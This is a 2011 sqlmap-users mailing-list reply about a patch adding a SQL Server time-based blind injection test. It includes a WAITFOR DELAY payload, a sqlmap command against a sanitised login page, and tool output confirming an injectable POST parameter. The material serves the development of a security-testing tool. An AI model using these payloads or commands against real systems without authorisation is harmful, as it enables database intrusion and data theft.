Re: [sqlmap-users] New SQL Server blind test

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

On 01/17/2011 07:02 PM, Miroslav Stampar wrote:
> Hi Steve.
> 
> Thank you for your patch but I am not sure from SQL's perspective how
> this could work?
> 
> So, basically, you are proposing time based sql injection payload (e.g.):
> 
> IF(1=1) WAITFOR DELAY '0:0:1'
> 
> and to be honest, I am not sure in which form, other than "stacked"
> this could fit in??
> 
> KR
> 
Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-)
Should work as an OR or AND statement, but then the present logical
state of the query matters.


Here's the output from my successful run using the patch, sanitised for
public viewing:
./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST
--data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server'


    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 05:54:02

[05:54:02] [INFO] using 'bogonExampleData' as session file
[05:54:02] [INFO] testing connection to the target url
[05:54:02] [WARNING] the testable parameter 'id' you provided is not
into the Cookie
[05:54:02] [INFO] testing if the url is stable, wait a few seconds
[05:54:04] [INFO] url is stable
[05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might
not be injectable
[05:54:08] [INFO] testing sql injection on POST parameter 'id'
[05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause'
[05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
WHERE clause'
[05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based'
[05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase
time-based' injectable
[05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns'
POST parameter 'id' is vulnerable. Do you want to keep testing the
others? [y/N]
sqlmap identified the following injection points with a total of 31
HTTP(s) requests:
---
Place: POST
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase time-based
    Payload: id=asdf'  WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf
---

[05:55:18] [INFO] testing Microsoft SQL Server
[05:55:38] [INFO] confirming Microsoft SQL Server
[05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[05:56:40] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 18 times
[05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData'
[*] shutting down at: 05:56:40


-- 
 | Steven Pinkham, Security Consultant    |
 | http://www.mavensecurity.com           |
 | GPG public key ID CD31CAFB             |